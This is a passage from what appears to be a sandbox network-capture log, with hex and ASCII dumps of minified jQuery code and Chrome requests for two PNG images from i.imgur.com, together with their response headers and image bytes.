2025-02-25 16:12:46 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-02-25 16:12:46 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:46 UTC	546	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:46 UTC	758	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 203022 Date: Tue, 25 Feb 2025 16:12:46 GMT X-Served-By: cache-iad-kcgs7200129-IAD, cache-ewr-kewr1740026-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 3, 0 X-Timer: S1740499966.234270,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-02-25 16:12:46 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:46 UTC	546	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:46 UTC	759	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Tue, 25 Feb 2025 16:12:46 GMT Age: 252038 X-Served-By: cache-iad-kjyo7100129-IAD, cache-ewr-kewr1740041-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 4, 2 X-Timer: S1740499966.237260,VS0,VE0 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-02-25 16:12:46 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:47 UTC	346	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:47 UTC	758	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Tue, 25 Feb 2025 16:12:47 GMT Age: 203024 X-Served-By: cache-iad-kcgs7200129-IAD, cache-ewr-kewr1740054-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 3, 1 X-Timer: S1740499967.458864,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
